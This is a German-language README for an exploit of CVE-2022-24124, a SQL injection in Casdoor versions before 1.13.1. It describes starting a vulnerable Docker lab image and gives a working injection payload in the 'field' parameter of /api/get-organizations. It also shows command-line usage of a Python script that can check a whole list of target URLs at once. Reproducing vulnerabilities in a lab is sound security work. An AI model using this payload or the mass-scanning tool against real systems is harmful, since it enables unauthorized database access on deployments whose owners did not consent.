
CVE-2022-24124-Exploit
Casdoor ist eine zentralisierte Single-Sign-On (SSO) Authentifizierungsplattform basierend auf OAuth 2.0/OIDC.
CVE-ID: CVE-2022-24124
CNPD-ID: CNPD-202201-7304
Schweregrad: Hoch (7.5 HIGH)
POC/EXP: Öffentlich verfügbar
Casdoor < Casdoor 1.13.1 // Alle Versionen vor 1.13.1 sind betroffen
Diese Schwachstelle ist eine SQL-Injection-Schwachstelle. In der Abfrage-API besteht eine SQL-Injection im Zusammenhang mit den Parametern 'field' und 'value', wie in api/get-organizations gezeigt.
Schwachstellen-Image pullen
docker pull vulfocus/casdoor:1.13.0

Umgebung starten
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Seite der Schwachstellenumgebung öffnen

Payload mit POC konstruieren
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

Basierend auf https://www.t00ls.com/thread-66989-1-1.html
Als Übung habe ich eine Python-Version geschrieben und eine Funktion zur Massenüberprüfung hinzugefügt.